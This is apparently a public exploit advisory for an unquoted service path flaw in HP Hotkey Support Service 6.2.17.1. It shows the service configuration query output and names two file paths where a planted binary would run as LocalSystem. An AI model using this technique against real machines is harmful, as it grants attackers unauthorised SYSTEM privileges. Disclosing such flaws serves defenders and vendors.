HP Hotkey Support Service version 6.2.17.1 suffers from an unquoted service path privilege escalation vulnerability.
dc7d2fd0c62a3d7bb3e72e23da04c7f78b145983528d500e6664d85e637e45f5
# Exploit Title: [HP Hotkey Support Service - Unquoted Service Path Privilege Escalation]
# Date: [date]
# Exploit Author: [Owais Mehtab, Tayeeb Rana]
# Vendor Homepage: [https://www.hp.com/]
# Software Link: [https://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_129672_1]
# Version: [6.2.17.1]
# Tested on: [Win7 Sp1]
C:\>sc qc "HP Hotkey Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: HP Hotkey Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : D:\Program Files (x86)\HP\HP Hotkey Support\HotkeyService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HP Hotkey Service
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
An attacker can place binaries in following locations to execute it under LocalSystem account since the binary path is not in double quotes
D:\Program.exe
D:\Program Files (x86)\HP\HP.exe